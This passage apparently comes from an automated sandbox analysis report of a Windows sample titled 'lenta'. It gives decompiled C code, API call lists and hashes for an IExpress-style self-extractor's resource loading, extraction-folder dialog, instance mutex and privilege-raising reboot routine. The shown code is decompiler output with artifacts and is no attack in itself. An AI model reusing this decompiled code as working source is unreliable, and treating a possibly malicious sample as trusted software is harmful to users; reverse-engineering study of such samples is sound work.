                            • CharUpperA.USER32(-00000052), ref: 00945EE1
                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00945F6F
                            • CharUpperA.USER32(?), ref: 00945FA7
                            • CharUpperA.USER32(-0000004E), ref: 00946008
                            • CharUpperA.USER32(?), ref: 009460AA
                            • CloseHandle.KERNEL32(00000000,00941140,00000000,00000040,00000000), ref: 009461F1
                            • ExitProcess.KERNEL32 ref: 009461F8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                            • String ID: "$"$:$RegServer
                            • API String ID: 1203814774-25366791
                            • Opcode ID: a9a6199efc161993896c53440d242e58b2c0f1b1ab485148b7a12bff9eb34654
                            • Instruction ID: be07c3040db32188d55fdd666d6f9cd7de407203f05c189c139dd45d521ea753
                            • Opcode Fuzzy Hash: a9a6199efc161993896c53440d242e58b2c0f1b1ab485148b7a12bff9eb34654
                            • Instruction Fuzzy Hash: EAD16C71A18A446FDF358BB89C48FBB3769AB17304F1544EAC4C6C7193D6B48E86DB02
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 60%
                            			E00941F90(signed int __ecx, void* __edi, void* __esi) {
                            				signed int _v8;
                            				int _v12;
                            				struct _TOKEN_PRIVILEGES _v24;
                            				void* _v28;
                            				void* __ebx;
                            				signed int _t13;
                            				int _t21;
                            				void* _t25;
                            				int _t28;
                            				signed char _t30;
                            				void* _t38;
                            				void* _t40;
                            				void* _t41;
                            				signed int _t46;
                            
                            				_t41 = __esi;
                            				_t38 = __edi;
                            				_t30 = __ecx;
                            				if((__ecx & 0x00000002) != 0) {
                            					L12:
                            					if((_t30 & 0x00000004) != 0) {
                            						L14:
                            						if( *0x949a40 != 0) {
                            							_pop(_t30);
                            							_t44 = _t46;
                            							_t13 =  *0x948004; // 0xec518a5e
                            							_v8 = _t13 ^ _t46;
                            							_push(_t38);
                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                            								_v24.PrivilegeCount = 1;
                            								_v12 = 2;
                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                            								CloseHandle(_v28);
                            								_t41 = _t41;
                            								_push(0);
                            								if(_t21 != 0) {
                            									if(ExitWindowsEx(2, ??) != 0) {
                            										_t25 = 1;
                            									} else {
                            										_t37 = 0x4f7;
                            										goto L3;
                            									}
                            								} else {
                            									_t37 = 0x4f6;
                            									goto L4;
                            								}
                            							} else {
                            								_t37 = 0x4f5;
                            								L3:
                            								_push(0);
                            								L4:
                            								_push(0x10);
                            								_push(0);
                            								_push(0);
                            								E009444B9(0, _t37);
                            								_t25 = 0;
                            							}
                            							_pop(_t40);
                            							return E00946CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                            						} else {
                            							_t28 = ExitWindowsEx(2, 0);
                            							goto L16;
                            						}
                            					} else {
                            						_t37 = 0x522;
                            						_t28 = E009444B9(0, 0x522, 0x941140, 0, 0x40, 4);
                            						if(_t28 != 6) {
                            							goto L16;
                            						} else {
                            							goto L14;
                            						}
                            					}
                            				} else {
                            					__eax = E00941EA7(__ecx);
                            					if(__eax != 2) {
                            						L16:
                            						return _t28;
                            					} else {
                            						goto L12;
                            					}
                            				}
                            			}

















                            0x00941f90
                            0x00941f90
                            0x00941f93
                            0x00941f98
                            0x00941fa4
                            0x00941fa7
                            0x00941fc5
                            0x00941fcd
                            0x00941fdb
                            0x00941ee5
                            0x00941eea
                            0x00941ef1
                            0x00941ef4
                            0x00941f0c
                            0x00941f2e
                            0x00941f3a
                            0x00941f46
                            0x00941f4d
                            0x00941f58
                            0x00941f60
                            0x00941f61
                            0x00941f62
                            0x00941f75
                            0x00941f80
                            0x00941f77
                            0x00941f77
                            0x00000000
                            0x00941f77
                            0x00941f64
                            0x00941f64
                            0x00000000
                            0x00941f64
                            0x00941f0e
                            0x00941f0e
                            0x00941f13
                            0x00941f13
                            0x00941f14
                            0x00941f14
                            0x00941f16
                            0x00941f17
                            0x00941f1a
                            0x00941f1f
                            0x00941f1f
                            0x00941f86
                            0x00941f8f
                            0x00941fcf
                            0x00941fd3
                            0x00000000
                            0x00941fd3
                            0x00941fa9
                            0x00941fb4
                            0x00941fbb
                            0x00941fc3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00941fc3
                            0x00941f9a
                            0x00941f9a
                            0x00941fa2
                            0x00941fd9
                            0x00941fda
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00941fa2

                            APIs
                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00941EFB
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00941F02
                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00941FD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Process$CurrentExitOpenTokenWindows
                            • String ID: SeShutdownPrivilege
                            • API String ID: 2795981589-3733053543
                            • Opcode ID: 4daa970d68e2d224552eb895616cb975bfb18162b0cabf5b43795ba78632f23a
                            • Instruction ID: 9688913b7fdda8229bbce872f7226e8a7f533d09831a3ed66324f02744e877b8
                            • Opcode Fuzzy Hash: 4daa970d68e2d224552eb895616cb975bfb18162b0cabf5b43795ba78632f23a
                            • Instruction Fuzzy Hash: 5A213875B582057BDB305BA1DC4AFBF77BCEBCBB10F100058FA02E2081D7348886A262
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00946CF0(struct _EXCEPTION_POINTERS* _a4) {
                            
                            				SetUnhandledExceptionFilter(0);
                            				UnhandledExceptionFilter(_a4);
                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                            			}



                            0x00946cf7
                            0x00946d00
                            0x00946d19

                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00946E26,00941000), ref: 00946CF7
                            • UnhandledExceptionFilter.KERNEL32(00946E26,?,00946E26,00941000), ref: 00946D00
                            • GetCurrentProcess.KERNEL32(C0000409,?,00946E26,00941000), ref: 00946D0B
                            • TerminateProcess.KERNEL32(00000000,?,00946E26,00941000), ref: 00946D12
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                            • String ID:
                            • API String ID: 3231755760-0
                            • Opcode ID: 6eda2d861aeb96bbf3794e1bb51e0b47b7be2f073d20f57d83238441f5396713
                            • Instruction ID: c875e98a41cdab2b2a0d235d375e3a5b3cb09945c6734157cf4ea0f22094b3e7
                            • Opcode Fuzzy Hash: 6eda2d861aeb96bbf3794e1bb51e0b47b7be2f073d20f57d83238441f5396713
                            • Instruction Fuzzy Hash: 54D0C93A09C108BBEB002BE1EC0CE593F28EB4E222F444004F31982020DA324851EB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E00943210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                            				void* __edi;
                            				void* _t6;
                            				void* _t10;
                            				int _t20;
                            				int _t21;
                            				int _t23;
                            				char _t24;
                            				long _t25;
                            				int _t27;
                            				int _t30;
                            				void* _t32;
                            				int _t33;
                            				int _t34;
                            				int _t37;
                            				int _t38;
                            				int _t39;
                            				void* _t42;
                            				void* _t46;
                            				CHAR* _t49;
                            				void* _t58;
                            				void* _t63;
                            				struct HWND__* _t64;
                            
                            				_t64 = _a4;
                            				_t6 = _a8 - 0x10;
                            				if(_t6 == 0) {
                            					_push(0);
                            					L38:
                            					EndDialog(_t64, ??);
                            					L39:
                            					__eflags = 1;
                            					return 1;
                            				}
                            				_t42 = 1;
                            				_t10 = _t6 - 0x100;
                            				if(_t10 == 0) {
                            					E009443D0(_t64, GetDesktopWindow());
                            					SetWindowTextA(_t64, "lenta");
                            					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                            					__eflags =  *0x949a40 - _t42; // 0x3
                            					if(__eflags == 0) {
                            						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                            					}
                            					L36:
                            					return _t42;
                            				}
                            				if(_t10 == _t42) {
                            					_t20 = _a12 - 1;
                            					__eflags = _t20;
                            					if(_t20 == 0) {
                            						_t21 = GetDlgItemTextA(_t64, 0x835, 0x9491e4, 0x104);
                            						__eflags = _t21;
                            						if(_t21 == 0) {
                            							L32:
                            							_t58 = 0x4bf;
                            							_push(0);
                            							_push(0x10);
                            							_push(0);
                            							_push(0);
                            							L25:
                            							E009444B9(_t64, _t58);
                            							goto L39;
                            						}
                            						_t49 = 0x9491e4;
                            						do {
                            							_t23 =  *_t49;
                            							_t49 =  &(_t49[1]);
                            							__eflags = _t23;
                            						} while (_t23 != 0);
                            						__eflags = _t49 - 0x9491e5 - 3;
                            						if(_t49 - 0x9491e5 < 3) {
                            							goto L32;
                            						}
                            						_t24 =  *0x9491e5; // 0x3a
                            						__eflags = _t24 - 0x3a;
                            						if(_t24 == 0x3a) {
                            							L21:
                            							_t25 = GetFileAttributesA(0x9491e4);
                            							__eflags = _t25 - 0xffffffff;
                            							if(_t25 != 0xffffffff) {
                            								L26:
                            								E0094658A(0x9491e4, 0x104, 0x941140);
                            								_t27 = E009458C8(0x9491e4);
                            								__eflags = _t27;
                            								if(_t27 != 0) {
                            									__eflags =  *0x9491e4 - 0x5c;
                            									if( *0x9491e4 != 0x5c) {
                            										L30:
                            										_t30 = E0094597D(0x9491e4, 1, _t64, 1);
                            										__eflags = _t30;
                            										if(_t30 == 0) {
                            											L35:
                            											_t42 = 1;
                            											__eflags = 1;
                            											goto L36;
                            										}
                            										L31:
                            										_t42 = 1;
                            										EndDialog(_t64, 1);
                            										goto L36;
                            									}
                            									__eflags =  *0x9491e5 - 0x5c;
                            									if( *0x9491e5 == 0x5c) {
                            										goto L31;
                            									}
                            									goto L30;
                            								}
                            								_push(0);
                            								_push(0x10);
                            								_push(0);
                            								_push(0);
                            								_t58 = 0x4be;
                            								goto L25;
                            							}
                            							_t32 = E009444B9(_t64, 0x54a, 0x9491e4, 0, 0x20, 4);
                            							__eflags = _t32 - 6;
                            							if(_t32 != 6) {
                            								goto L35;
                            							}
                            							_t33 = CreateDirectoryA(0x9491e4, 0);
                            							__eflags = _t33;
                            							if(_t33 != 0) {
                            								goto L26;
                            							}
                            							_push(0);
                            							_push(0x10);
                            							_push(0);
                            							_push(0x9491e4);
                            							_t58 = 0x4cb;
                            							goto L25;
                            						}
                            						__eflags =  *0x9491e4 - 0x5c;
                            						if( *0x9491e4 != 0x5c) {
                            							goto L32;
                            						}
                            						__eflags = _t24 - 0x5c;
                            						if(_t24 != 0x5c) {
                            							goto L32;
                            						}
                            						goto L21;
                            					}
                            					_t34 = _t20 - 1;
                            					__eflags = _t34;
                            					if(_t34 == 0) {
                            						EndDialog(_t64, 0);
                            						 *0x949124 = 0x800704c7;
                            						goto L39;
                            					}
                            					__eflags = _t34 != 0x834;
                            					if(_t34 != 0x834) {
                            						goto L36;
                            					}
                            					_t37 = LoadStringA( *0x949a3c, 0x3e8, 0x948598, 0x200);
                            					__eflags = _t37;
                            					if(_t37 != 0) {
                            						_t38 = E00944224(_t64, _t46, _t46);
                            						__eflags = _t38;
                            						if(_t38 == 0) {
                            							goto L36;
                            						}
                            						_t39 = SetDlgItemTextA(_t64, 0x835, 0x9487a0);
                            						__eflags = _t39;
                            						if(_t39 != 0) {
                            							goto L36;
                            						}
                            						_t63 = 0x4c0;
                            						L9:
                            						E009444B9(_t64, _t63, 0, 0, 0x10, 0);
                            						_push(0);
                            						goto L38;
                            					}
                            					_t63 = 0x4b1;
                            					goto L9;
                            				}
                            				return 0;
                            			}

























                            0x0094321b
                            0x0094321e
                            0x00943221
                            0x0094343c
                            0x0094343e
                            0x0094343f
                            0x00943445
                            0x00943447
                            0x00000000
                            0x00943447
                            0x00943229
                            0x0094322a
                            0x0094322f
                            0x009433ec
                            0x009433f7
                            0x00943410
                            0x00943416
                            0x0094341d
                            0x0094342d
                            0x0094342d
                            0x00943438
                            0x00000000
                            0x00943438
                            0x00943237
                            0x00943243
                            0x00943243
                            0x00943246
                            0x009432ee
                            0x009432f4
                            0x009432f6
                            0x009433d4
                            0x009433d6
                            0x009433db
                            0x009433dc
                            0x009433de
                            0x009433df
                            0x00943370
                            0x00943372
                            0x00000000
                            0x00943372
                            0x009432fc
                            0x00943301
                            0x00943301
                            0x00943303
                            0x00943304
                            0x00943304
                            0x0094330a
                            0x0094330d
                            0x00000000
                            0x00000000
                            0x00943313
                            0x00943318
                            0x0094331a
                            0x00943331
                            0x00943332
                            0x0094333a
                            0x0094333d
                            0x0094337c
                            0x00943388
                            0x0094338f
                            0x00943394
                            0x00943396
                            0x009433a4
                            0x009433ab
                            0x009433b6
                            0x009433be
                            0x009433c3
                            0x009433c5
                            0x00943435
                            0x00943437
                            0x00943437
                            0x00000000
                            0x00943437
                            0x009433c7
                            0x009433c9
                            0x009433cc
                            0x00000000
                            0x009433cc
                            0x009433ad
                            0x009433b4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009433b4
                            0x00943398
                            0x00943399
                            0x0094339b
                            0x0094339c
                            0x0094339d
                            0x00000000
                            0x0094339d
                            0x0094334c
                            0x00943351
                            0x00943354
                            0x00000000
                            0x00000000
                            0x0094335c
                            0x00943362
                            0x00943364
                            0x00000000
                            0x00000000
                            0x00943366
                            0x00943367
                            0x00943369
                            0x0094336a
                            0x0094336b
                            0x00000000
                            0x0094336b
                            0x0094331c
                            0x00943323
                            0x00000000
                            0x00000000
                            0x00943329
                            0x0094332b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0094332b
                            0x0094324c
                            0x0094324c
                            0x0094324f
                            0x009432c8
                            0x009432ce
                            0x00000000
                            0x009432ce
                            0x00943251
                            0x00943256
                            0x00000000
                            0x00000000
                            0x00943271
                            0x00943277
                            0x00943279
                            0x00943298
                            0x0094329d
                            0x0094329f
                            0x00000000
                            0x00000000
                            0x009432b0
                            0x009432b6
                            0x009432b8
                            0x00000000
                            0x00000000
                            0x009432be
                            0x00943280
                            0x00943289
                            0x0094328e
                            0x00000000
                            0x0094328e
                            0x0094327b
                            0x00000000
                            0x0094327b
                            0x00000000

                            APIs
                            • LoadStringA.USER32(000003E8,00948598,00000200), ref: 00943271
                            • GetDesktopWindow.USER32 ref: 009433E2
                            • SetWindowTextA.USER32(?,lenta), ref: 009433F7
                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00943410
                            • GetDlgItem.USER32(?,00000836), ref: 00943426
                            • EnableWindow.USER32(00000000), ref: 0094342D
                            • EndDialog.USER32(?,00000000), ref: 0094343F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$lenta
                            • API String ID: 2418873061-1804823871
                            • Opcode ID: 993eebe98e8d9a8f510020b6126f804dd94eacd9ada2edb122040c5e9ba4a0ed
                            • Instruction ID: 8406dbc2f929d807c34b4e94bdacf689e712777953c01b4f25108be4fa4a0c19
                            • Opcode Fuzzy Hash: 993eebe98e8d9a8f510020b6126f804dd94eacd9ada2edb122040c5e9ba4a0ed
                            • Instruction Fuzzy Hash: 455147343982407BFB316F355C8CFBB2A5CDB8BB54F50C528F206961E1DAA88E01E361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E00942CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                            				signed int _v8;
                            				char _v268;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t13;
                            				void* _t20;
                            				void* _t23;
                            				void* _t27;
                            				struct HRSRC__* _t31;
                            				intOrPtr _t33;
                            				void* _t43;
                            				void* _t48;
                            				signed int _t65;
                            				struct HINSTANCE__* _t66;
                            				signed int _t67;
                            
                            				_t13 =  *0x948004; // 0xec518a5e
                            				_v8 = _t13 ^ _t67;
                            				_t65 = 0;
                            				_t66 = __ecx;
                            				_t48 = __edx;
                            				 *0x949a3c = __ecx;
                            				memset(0x949140, 0, 0x8fc);
                            				memset(0x948a20, 0, 0x32c);
                            				memset(0x9488c0, 0, 0x104);
                            				 *0x9493ec = 1;
                            				_t20 = E0094468F("TITLE", 0x949154, 0x7f);
                            				if(_t20 == 0 || _t20 > 0x80) {
                            					_t64 = 0x4b1;
                            					goto L32;
                            				} else {
                            					_t27 = CreateEventA(0, 1, 1, 0);
                            					 *0x94858c = _t27;
                            					SetEvent(_t27);
                            					_t64 = 0x949a34;
                            					if(E0094468F("EXTRACTOPT", 0x949a34, 4) != 0) {
                            						if(( *0x949a34 & 0x000000c0) == 0) {
                            							L12:
                            							 *0x949120 =  *0x949120 & _t65;
                            							if(E00945C9E(_t48, _t48, _t65, _t66) != 0) {
                            								if( *0x948a3a == 0) {
                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                            									if(_t31 != 0) {
                            										_t65 = LoadResource(_t66, _t31);
                            									}
                            									if( *0x948184 != 0) {
                            										__imp__#17();
                            									}
                            									if( *0x948a24 == 0) {
                            										_t57 = _t65;
                            										if(E009436EE(_t65) == 0) {
                            											goto L33;
                            										} else {
                            											_t33 =  *0x949a40; // 0x3
                            											_t48 = 1;
                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                            												if(( *0x949a34 & 0x00000100) == 0 || ( *0x948a38 & 0x00000001) != 0 || E009418A3(_t64, _t66) != 0) {
                            													goto L30;
                            												} else {
                            													_t64 = 0x7d6;
                            													if(E00946517(_t57, 0x7d6, _t34, E009419E0, 0x547, 0x83e) != 0x83d) {
                            														goto L33;
                            													} else {
                            														goto L30;
                            													}
                            												}
                            											} else {
                            												L30:
                            												_t23 = _t48;
                            											}
                            										}
                            									} else {
                            										_t23 = 1;
                            									}
                            								} else {
                            									E00942390(0x948a3a);
                            									goto L33;
                            								}
                            							} else {
                            								_t64 = 0x520;
                            								L32:
                            								E009444B9(0, _t64, 0, 0, 0x10, 0);
                            								goto L33;
                            							}
                            						} else {
                            							_t64 =  &_v268;
                            							if(E0094468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                            								goto L3;
                            							} else {
                            								_t43 = CreateMutexA(0, 1,  &_v268);
                            								 *0x948588 = _t43;
                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                            									goto L12;
                            								} else {
                            									if(( *0x949a34 & 0x00000080) == 0) {
                            										_t64 = 0x524;
                            										if(E009444B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                            											goto L12;
                            										} else {
                            											goto L11;
                            										}
                            									} else {
                            										_t64 = 0x54b;
                            										E009444B9(0, 0x54b, "lenta", 0, 0x10, 0);
                            										L11:
                            										CloseHandle( *0x948588);
                            										 *0x949124 = 0x800700b7;
                            										goto L33;
                            									}
                            								}
                            							}
                            						}
                            					} else {
                            						L3:
                            						_t64 = 0x4b1;
                            						E009444B9(0, 0x4b1, 0, 0, 0x10, 0);
                            						 *0x949124 = 0x80070714;
                            						L33:
                            						_t23 = 0;
                            					}
                            				}
                            				return E00946CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                            			}



















                            0x00942cb5
                            0x00942cbc
                            0x00942cc7
                            0x00942cc9
                            0x00942cd1
                            0x00942cd3
                            0x00942cd9
                            0x00942ce9
                            0x00942cf9
                            0x00942d0e
                            0x00942d15
                            0x00942d1c
                            0x00942ef3
                            0x00000000
                            0x00942d2d
                            0x00942d34
                            0x00942d3b
                            0x00942d40
                            0x00942d48
                            0x00942d59
                            0x00942d84
                            0x00942e1f
                            0x00942e1f
                            0x00942e2e
                            0x00942e41
                            0x00942e5a
                            0x00942e62
                            0x00942e6c
                            0x00942e6c
                            0x00942e75
                            0x00942e77
                            0x00942e77
                            0x00942e84
                            0x00942e8b
                            0x00942e94
                            0x00000000
                            0x00942e96
                            0x00942e96
                            0x00942e9e
                            0x00942ea2
                            0x00942eba
                            0x00000000
                            0x00942ece
                            0x00942ede
                            0x00942eed
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00942eed
                            0x00942eef
                            0x00942eef
                            0x00942eef
                            0x00942eef
                            0x00942ea2
                            0x00942e86
                            0x00942e88
                            0x00942e88
                            0x00942e43
                            0x00942e48
                            0x00000000
                            0x00942e48
                            0x00942e30
                            0x00942e30
                            0x00942ef8
                            0x00942f01
                            0x00000000
                            0x00942f01
                            0x00942d8a
                            0x00942d8f
                            0x00942da1
                            0x00000000
                            0x00942da3
                            0x00942dae
                            0x00942db4
                            0x00942dbb
                            0x00000000
                            0x00942dca
                            0x00942dd3
                            0x00942df5
                            0x00942e02
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00942dd5
                            0x00942dde
                            0x00942de3
                            0x00942e04
                            0x00942e0a
                            0x00942e10
                            0x00000000
                            0x00942e10
                            0x00942dd3
                            0x00942dbb
                            0x00942da1
                            0x00942d5b
                            0x00942d5b
                            0x00942d5d
                            0x00942d69
                            0x00942d6e
                            0x00942f06
                            0x00942f06
                            0x00942f06
                            0x00942d59
                            0x00942f18

                            APIs
                            • memset.MSVCRT ref: 00942CD9
                            • memset.MSVCRT ref: 00942CE9
                            • memset.MSVCRT ref: 00942CF9
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
                              • Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
                              • Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
                              • Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
                              • Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
                              • Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF
                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00942D34
                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00942D40
                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00942DAE
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00942DBD
                            • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00942E0A
                              • Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
                              • Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                            • API String ID: 1002816675-2993962200
                            • Opcode ID: 6904362d6c3758284f5de7b86b89b13da159452ade1b777f35e2d87629992a1e
                            • Instruction ID: 3cfff56992cd0969e5847092c57e6fe4389755e24987d8e377396c4c62ff677f
                            • Opcode Fuzzy Hash: 6904362d6c3758284f5de7b86b89b13da159452ade1b777f35e2d87629992a1e
                            • Instruction Fuzzy Hash: EC51D374758301ABE724AB749C4AF7B369CFB87718F804429F941D61E1DBB88881E722
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 81%
                            			E009434F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                            				void* _t9;
                            				void* _t12;
                            				void* _t13;
                            				void* _t17;
                            				void* _t23;
                            				void* _t25;
                            				struct HWND__* _t35;
                            				struct HWND__* _t38;
                            				void* _t39;
                            
                            				_t9 = _a8 - 0x10;
                            				if(_t9 == 0) {
                            					__eflags = 1;
                            					L19:
                            					_push(0);
                            					 *0x9491d8 = 1;
                            					L20:
                            					_push(_a4);
                            					L21:
                            					EndDialog();
                            					L22:
                            					return 1;
                            				}
                            				_push(1);
                            				_pop(1);
                            				_t12 = _t9 - 0xf2;
                            				if(_t12 == 0) {
                            					__eflags = _a12 - 0x1b;
                            					if(_a12 != 0x1b) {
                            						goto L22;
                            					}
                            					goto L19;
                            				}
                            				_t13 = _t12 - 0xe;
                            				if(_t13 == 0) {
                            					_t35 = _a4;
                            					 *0x948584 = _t35;
                            					E009443D0(_t35, GetDesktopWindow());
                            					__eflags =  *0x948184; // 0x1
                            					if(__eflags != 0) {
                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                            					}
                            					SetWindowTextA(_t35, "lenta");
                            					_t17 = CreateThread(0, 0, E00944FE0, 0, 0, 0x948798);
                            					 *0x94879c = _t17;
                            					__eflags = _t17;
                            					if(_t17 != 0) {
                            						goto L22;
                            					} else {
                            						E009444B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                            						_push(0);
                            						_push(_t35);
                            						goto L21;
                            					}
                            				}
                            				_t23 = _t13 - 1;
                            				if(_t23 == 0) {
                            					__eflags = _a12 - 2;
                            					if(_a12 != 2) {
                            						goto L22;
                            					}
                            					ResetEvent( *0x94858c);
                            					_t38 =  *0x948584; // 0x0
                            					_t25 = E009444B9(_t38, 0x4b2, 0x941140, 0, 0x20, 4);
                            					__eflags = _t25 - 6;
                            					if(_t25 == 6) {
                            						L11:
                            						 *0x9491d8 = 1;
                            						SetEvent( *0x94858c);
                            						_t39 =  *0x94879c; // 0x0
                            						E00943680(_t39);
                            						_push(0);
                            						goto L20;
                            					}
                            					__eflags = _t25 - 1;
                            					if(_t25 == 1) {
                            						goto L11;
                            					}
                            					SetEvent( *0x94858c);
                            					goto L22;
                            				}
                            				if(_t23 == 0xe90) {
                            					TerminateThread( *0x94879c, 0);
                            					EndDialog(_a4, _a12);
                            					return 1;
                            				}
                            				return 0;
                            			}












                            0x009434fb
                            0x009434fe
                            0x00943665
                            0x00943666
                            0x00943666
                            0x00943668
                            0x0094366e
                            0x0094366e
                            0x00943671
                            0x00943671
                            0x00943677
                            0x00000000
                            0x00943677
                            0x00943504
                            0x00943506
